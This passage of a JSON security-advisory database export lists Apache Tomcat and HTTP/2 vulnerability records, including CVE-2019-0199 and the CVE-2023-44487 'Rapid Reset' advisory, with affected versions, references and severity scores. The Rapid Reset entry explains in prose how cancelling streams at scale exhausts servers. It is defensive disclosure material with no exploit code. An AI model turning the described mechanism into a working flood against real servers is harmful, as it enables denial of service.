"https://github.com/apache/tomcat/commit/ada725a50a60867af3422c8e612aecaeea856a9a" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190625-0002" }, { "type": "WEB", "url": "https://support.f5.com/csp/article/K17321505" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-8.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html" }, { "type": "WEB", "url": "https://usn.ubuntu.com/4128-1" }, { "type": "WEB", "url": "https://usn.ubuntu.com/4128-2" }, { "type": "WEB", "url": "https://web.archive.org/web/20200227033743/http://www.securityfocus.com/bid/108874" }, { "type": "WEB", "url": "https://www.debian.org/security/2020/dsa-4680" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://www.synology.com/security/advisory/Synology_SA_19_29" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/df1a2c1b87c8a6c500ecdbbaf134c7f1491c8d79d98b48c6b9f0fa6a@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/df1a2c1b87c8a6c500ecdbbaf134c7f1491c8d79d98b48c6b9f0fa6a%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3931" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3929" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00013.html" } ], "database_specific": { "cwe_ids": [ "CWE-667" ], "github_reviewed": true, "github_reviewed_at": "2019-06-26T00:56:45Z", "nvd_published_at": "2019-06-21T18:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-qcxh-w3j9-58qr", "published": "2020-06-15T18:51:09Z", "modified": "2024-03-16T05:16:48.960226Z", "aliases": [ "CVE-2019-0199" ], "summary": "Apache Tomcat Denial of Service vulnerability", "details": "The HTTP/2 implementation in Apache Tomcat 9.0.0.M1 to 9.0.14 and 8.5.0 to 8.5.37 accepted streams with excessive numbers of SETTINGS frames and also permitted clients to keep streams open without reading/writing request/response data. By keeping streams open for requests that utilised the Servlet API's blocking I/O, clients were able to cause server-side threads to block eventually leading to thread exhaustion and a DoS.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0" }, { "fixed": "9.0.16" } ] } ], "versions": [ "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.2", "9.0.4", "9.0.5", "9.0.6", "9.0.7", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-qcxh-w3j9-58qr/GHSA-qcxh-w3j9-58qr.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0" }, { "fixed": "8.5.38" } ] } ], "versions": [ "8.0.1", "8.0.11", "8.0.12", "8.0.14", "8.0.15", "8.0.17", "8.0.18", "8.0.20", "8.0.21", "8.0.22", "8.0.23", "8.0.24", "8.0.26", "8.0.27", "8.0.28", "8.0.29", "8.0.3", "8.0.30", "8.0.32", "8.0.33", "8.0.35", "8.0.36", "8.0.37", "8.0.38", "8.0.39", "8.0.41", "8.0.42", "8.0.43", "8.0.44", "8.0.45", "8.0.46", "8.0.47", "8.0.48", "8.0.49", "8.0.5", "8.0.50", "8.0.51", "8.0.52", "8.0.53", "8.0.8", "8.0.9", "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.4", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-qcxh-w3j9-58qr/GHSA-qcxh-w3j9-58qr.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-0199" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e1b0b273b6e8ddcc72c9023bc2394b1276fc72664144bf21d0a87995@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e56886e1bac9319ecce81b3612dd7a1a43174a3a741a1c805e16880e%40%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e56886e1bac9319ecce81b3612dd7a1a43174a3a741a1c805e16880e@%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e87733036e8c84ea648cdcdca3098f3c8a897e2652c33062b2b1535c%40%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e87733036e8c84ea648cdcdca3098f3c8a897e2652c33062b2b1535c@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NPHQEL5AQ6LZSZD2Y6TYZ4RC3WI7NXJ3" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZQTZ5BJ5F4KV6N53SGNKSW3UY5DBIQ46" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPHQEL5AQ6LZSZD2Y6TYZ4RC3WI7NXJ3" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQTZ5BJ5F4KV6N53SGNKSW3UY5DBIQ46" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/Dec/43" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190419-0001" }, { "type": "WEB", "url": "https://support.f5.com/csp/article/K17321505" }, { "type": "WEB", "url": "https://web.archive.org/web/20200227030041/http://www.securityfocus.com/bid/107674" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4596" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3929" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3931" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/158ab719cf60448ddbb074798f09152fdb572fc8f781e70a56118d1a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/158ab719cf60448ddbb074798f09152fdb572fc8f781e70a56118d1a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/4c438fa4c78cb1ce8979077f668ab7145baf83e7c59f2faf7eccf094%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/4c438fa4c78cb1ce8979077f668ab7145baf83e7c59f2faf7eccf094@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/7bb193bc68b28d21ff1c726fd38bea164deb6333b59eec2eb3661da6%40%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/7bb193bc68b28d21ff1c726fd38bea164deb6333b59eec2eb3661da6@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9fe25f98bac6d66f8a663a15c37a98bc2d8f8bbed1d408791a3e4067%40%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9fe25f98bac6d66f8a663a15c37a98bc2d8f8bbed1d408791a3e4067@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a7a201bd23e67fd3326c9b22b814dd0537d3270b3b54a768e2e7ef50%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a7a201bd23e67fd3326c9b22b814dd0537d3270b3b54a768e2e7ef50@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ac0185ce240a711b542a55bccf9349ab0c2f343d70cf7835e08fabc9%40%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ac0185ce240a711b542a55bccf9349ab0c2f343d70cf7835e08fabc9@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/cf4eb2bd2083cebb3602a293c653f9a7faa96c86f672c876f25b37ef%40%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/cf4eb2bd2083cebb3602a293c653f9a7faa96c86f672c876f25b37ef@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/dddb3590bac28fbe89f69f5ccbe26283d014ddc691abdd042de14600%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/dddb3590bac28fbe89f69f5ccbe26283d014ddc691abdd042de14600@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/df1a2c1b87c8a6c500ecdbbaf134c7f1491c8d79d98b48c6b9f0fa6a%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/df1a2c1b87c8a6c500ecdbbaf134c7f1491c8d79d98b48c6b9f0fa6a@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e1b0b273b6e8ddcc72c9023bc2394b1276fc72664144bf21d0a87995%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00090.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00013.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00054.html" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-15T16:43:54Z", "nvd_published_at": "2019-04-10T15:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-qppj-fm5r-hxr3", "published": "2023-10-10T21:28:24Z", "modified": "2025-10-22T19:55:03.871944Z", "aliases": [ "BIT-apisix-2023-44487", "BIT-aspnet-core-2023-44487", "BIT-contour-2023-44487", "BIT-dotnet-2023-44487", "BIT-dotnet-sdk-2023-44487", "BIT-envoy-2023-44487", "BIT-golang-2023-44487", "BIT-jenkins-2023-44487", "BIT-kong-2023-44487", "BIT-nginx-2023-44487", "BIT-nginx-ingress-controller-2023-44487", "BIT-node-2023-44487", "BIT-node-min-2023-44487", "BIT-solr-2023-44487", "BIT-tomcat-2023-44487", "BIT-varnish-2023-44487", "CGA-4mmr-qwxr-f88g", "CGA-5jp5-95p2-jw83", "CGA-5v4r-558c-254r", "CGA-9w4r-68hh-64j5", "CGA-m49h-wjp5-j434", "CGA-mp43-q6p3-96v2", "CVE-2023-44487", "GHSA-m425-mq94-257g", "GO-2023-2153" ], "related": [ "CGA-2299-p283-6754", "CGA-229m-7869-rw4v", "CGA-24hx-83pv-289x", "CGA-2pcr-mcjf-2wpx", "CGA-2qwx-p2mj-2vg9", "CGA-2rv9-rcgf-5jmv", "CGA-2v87-m46r-gjch", "CGA-2v95-w62h-qj34", "CGA-2vjm-8pmg-xm38", "CGA-2wf3-5p85-5cjv", "CGA-2xxq-x97g-5x4g", "CGA-349p-pq36-fxj6", "CGA-376q-594m-cg5h", "CGA-38xr-m6w5-7mjr", "CGA-3cjr-qphr-4q8c", "CGA-3g58-8vg4-j962", "CGA-3hw4-xp7w-mf8r", "CGA-3m7w-768w-7c63", "CGA-3qc4-4rpc-fw57", "CGA-3wv3-c8pc-vfc7", "CGA-42pp-gwp5-q5p4", "CGA-45r2-9m23-x9g6", "CGA-4779-25p4-j7h2", "CGA-4c3m-883j-8695", "CGA-4cgp-vvw6-j596", "CGA-4pfq-mx97-263v", "CGA-4qr9-f5q2-prfp", "CGA-4r3q-fgcw-49c7", "CGA-4rc6-3vhf-qf99", "CGA-4wwj-8m9v-fq8x", "CGA-5454-884w-3j88", "CGA-556h-c5fj-3w99", "CGA-56q4-xqhh-mfwx", "CGA-583h-35v8-3832", "CGA-59pp-cfxf-c3rf", "CGA-5gg6-x7qp-xxv4", "CGA-5m9g-9jqg-pxgg", "CGA-5q2w-xhwc-rwxc", "CGA-5rgp-q5p7-2mf5", "CGA-6642-55rh-hw42", "CGA-6ggm-gwjp-2q55", "CGA-6v26-8q96-376f", "CGA-6w85-h2rp-4xf2", "CGA-72wg-cw63-gf9v", "CGA-75wc-3qwg-w6r6", "CGA-765w-qmch-926x", "CGA-76j5-w627-hxq8", "CGA-7942-4mrf-v638", "CGA-7h6v-hgj5-rc6j", "CGA-7qcv-pmxr-hc3p", "CGA-7xrp-cfgv-p96p", "CGA-824v-jhv4-f4mw", "CGA-828f-q9xr-h575", "CGA-85m7-vwm2-3rgx", "CGA-87mj-vfr9-8342", "CGA-8893-2h9f-wpwr", "CGA-88pw-g8rx-54fw", "CGA-8ff8-px3p-27h2", "CGA-8gmp-6559-9h7f", "CGA-8h6j-5683-hj2p", "CGA-8ph8-2ph8-9526", "CGA-8qxj-xqxm-g9rj", "CGA-8w2g-p32j-34q7", "CGA-92p6-frjm-h6wh", "CGA-9336-v7qg-9pxr", "CGA-9653-v8w4-9j5m", "CGA-97gj-c86j-gmrh", "CGA-98pg-rvgm-vq7w", "CGA-9j94-gc38-2m2j", "CGA-9q26-2wgq-q8jq", "CGA-c2wj-qvw6-v5cc", "CGA-c4c9-566q-j9f8", "CGA-c5rg-gjw6-jhf5", "CGA-cc75-jr7m-v4rg", "CGA-cfmf-v2vf-446r", "CGA-cfpj-5fv4-gmqx", "CGA-crjx-p8j7-7mfq", "CGA-cxxg-fmvh-x664", "CGA-f5x2-3vrj-9h9j", "CGA-fh68-3rxp-2rr4", "CGA-fjj9-cf2q-279r", "CGA-fqmp-xrf6-2pq9", "CGA-g76q-386m-vw9c", "CGA-g8fr-g5rp-4g53", "CGA-gg7w-54jm-jc98", "CGA-gwxw-7hx6-fhc6", "CGA-gxgw-6wgc-3c72", "CGA-h2hr-q994-g57w", "CGA-h3hf-wvxm-w8fq", "CGA-h484-fxx6-7hrh", "CGA-h4hq-pj3g-852q", "CGA-h5p7-g2cp-wxvq", "CGA-h8xj-6f7x-vgcr", "CGA-hfrv-xx9v-v78g", "CGA-hg38-7g2w-6w7q", "CGA-hp8r-x64x-9wx8", "CGA-hq25-jj7j-2jhx", "CGA-hwq5-r477-jpjj", "CGA-hwwr-q8hg-7w7m", "CGA-hxgw-r76p-5q9f", "CGA-hxx6-782j-x2rg", "CGA-j7cc-x379-65f6", "CGA-j822-fhmp-r464", "CGA-j978-jw6m-g3m2", "CGA-j9wj-m9g4-3cqr", "CGA-jchg-g7m5-gx9j", "CGA-jfxc-mh76-f83w", "CGA-jm66-m52h-37p8", "CGA-jp5v-pxgv-mwxm", "CGA-jpm5-jx7m-gj52", "CGA-jqqv-mcm2-xfhf", "CGA-jrm6-4p39-vv8f", "CGA-m2rg-gw8g-jq3g", "CGA-m2vf-6j9c-q44v", "CGA-m2xm-59pf-m2w9", "CGA-m4ph-vwfq-6p88", "CGA-m6q6-3rm7-v7r7", "CGA-m929-58m9-46x7", "CGA-m96g-hjv2-7739", "CGA-mfww-9mm5-5q9p", "CGA-mh7x-f999-qfgr", "CGA-mh9m-rvrx-x78q", "CGA-mrg3-v5p6-fcrc", "CGA-mw67-9v22-xhfj", "CGA-mxmj-hx3p-86mr", "CGA-p3wv-wqgx-5f9g", "CGA-p488-4rp7-4vcq", "CGA-pm5v-cpg9-6pjv", "CGA-ppff-fghc-fmx2", "CGA-ppp5-rgx9-7cp5", "CGA-pvf6-v7vv-5pm8", "CGA-pwwr-2v47-j82m", "CGA-q23v-55fw-7wqq", "CGA-q2g4-fr75-mfgw", "CGA-q883-c6c7-5mrg", "CGA-q8f4-cjcq-pvcw", "CGA-q9x3-54qc-w4vx", "CGA-qf93-qqgg-57pp", "CGA-qg2x-rjrq-27j7", "CGA-qg4w-crjp-pm66", "CGA-qgcq-r8vq-cj48", "CGA-qj23-2j5c-346p", "CGA-qj39-h7mv-wvvr", "CGA-qqq4-xppr-35gx", "CGA-qrj8-7hhv-5fqr", "CGA-r3jw-5855-vm4v", "CGA-r3vf-8xgf-j7xf", "CGA-r65x-gccm-c3h9", "CGA-r672-cm53-wqp9", "CGA-r67v-7r7m-7mjm", "CGA-r6pc-j2w2-hg9j", "CGA-r83c-wr9j-cf47", "CGA-r8fq-45qw-f82f", "CGA-rfpm-7c5c-2jr7", "CGA-rh6x-pqw3-m94h", "CGA-rwg6-qrw3-mq94", "CGA-rwv7-vh72-vwm9", "CGA-rx36-6r58-w9cv", "CGA-v2x5-f8g9-xwxg", "CGA-v33m-mhpg-r9vc", "CGA-v69x-6w5f-9788", "CGA-v8m6-hgvj-q9jx", "CGA-v9r4-ppcg-99fx", "CGA-vg2f-7w94-hc6j", "CGA-vhg8-353g-xgjq", "CGA-vmv2-mcvh-c322", "CGA-vrwc-ghcx-vgf2", "CGA-vxx9-w3rw-hmm8", "CGA-w32j-65w7-364f", "CGA-w6jr-m8cm-cm2q", "CGA-w8w4-2885-pj8c", "CGA-w93r-jjhq-mrfj", "CGA-wcpm-f328-p4gm", "CGA-wcvh-j92g-4jf2", "CGA-wv77-q28p-3ccr", "CGA-wx95-wrvj-5fxq", "CGA-wxpj-97pc-mhgh", "CGA-x3c3-mgmr-7hfc", "CGA-x3gh-rmf6-3wm3", "CGA-x477-6cc3-862v", "CGA-x678-9j63-wf4w", "CGA-x7vm-wxp7-c7p6", "CGA-x866-fvq6-vg5f", "CGA-x87p-5crv-79j5", "CGA-x8gx-4p34-286q", "CGA-xfch-66rw-37j9", "CGA-xffp-8jxx-qx99", "CGA-xj77-2fg4-p9xh", "CGA-xq7r-vg65-qvmc", "CGA-xqpr-wh63-xxmp", "CGA-xr5x-637v-fqgc", "CGA-xxmc-xq95-99j2", "CVE-2023-44487" ], "summary": "HTTP/2 Stream Cancellation Attack", "details": "## HTTP/2 Rapid reset attack\nThe HTTP/2 protocol allows clients to indicate to the server that a previous stream should be canceled by sending a RST_STREAM frame. The protocol does not require the client and server to coordinate the cancellation in any way, the client may do it unilaterally. The client may also assume that the cancellation will take effect immediately when the server receives the RST_STREAM frame, before any other data from that TCP connection is processed.\n\nAbuse of this feature is called a Rapid Reset attack because it relies on the ability for an endpoint to send a RST_STREAM frame immediately after sending a request frame, which makes the other endpoint start working and then rapidly resets the request. The request is canceled, but leaves the HTTP/2 connection open. \n\nThe HTTP/2 Rapid Reset attack built on this capability is simple: The client opens a large number of streams at once as in the standard HTTP/2 attack, but rather than waiting for a response to each request stream from the server or proxy, the client cancels each request immediately.\n\nThe ability to reset streams immediately allows each connection to have an indefinite number of requests in flight. By explicitly canceling the requests, the attacker never exceeds the limit on the number of concurrent open streams. The number of in-flight requests is no longer dependent on the round-trip time (RTT), but only on the available network bandwidth.\n\nIn a typical HTTP/2 server implementation, the server will still have to do significant amounts of work for canceled requests, such as allocating new stream data structures, parsing the query and doing header decompression, and mapping the URL to a resource. For reverse proxy implementations, the request may be proxied to the backend server before the RST_STREAM frame is processed. The client on the other hand paid almost no costs for sending the requests. This creates an exploitable cost asymmetry between the server and the client.\n\nMultiple software artifacts implementing HTTP/2 are affected. This advisory was originally ingested from the `swift-nio-http2` repo advisory and their original conent follows.\n\n## swift-nio-http2 specific advisory\nswift-nio-http2 is vulnerable to a denial-of-service vulnerability in which a malicious client can create and then reset a large number of HTTP/2 streams in a short period of time. This causes swift-nio-http2 to commit to a large amount of expensive work which it then throws away, including creating entirely new `Channel`s to serve the traffic. This can easily overwhelm an `EventLoop` and prevent it from making forward progress.\n\nswift-nio-http2 1.28 contains a remediation for this issue that applies reset counter using a sliding window. This constrains the number of stream resets that may occur in a given window of time. Clients violating this limit will have their connections torn down. This allows clients to continue to cancel streams for legitimate reasons, while constraining malicious actors.", "affected": [ { "package": { "name": "github.com/apple/swift-nio-http2", "ecosystem": "SwiftURL", "purl": "pkg:swift/github.com/apple/swift-nio-http2" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.28.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "golang.org/x/net", "ecosystem": "Go", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.17.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.0-M12" } ] } ], "versions": [ "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0" }, { "fixed": "10.1.14" } ] } ], "versions": [ "10.0.0", "10.0.10", "10.0.11", "10.0.12", "10.0.13", "10.0.14", "10.0.16", "10.0.17", "10.0.18", "10.0.2", "10.0.20", "10.0.21", "10.0.22", "10.0.23", "10.0.26", "10.0.27", "10.0.4", "10.0.5", "10.0.6", "10.0.7", "10.0.8", "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.2", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0" }, { "fixed": "9.0.81" } ] } ], "versions": [ "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": 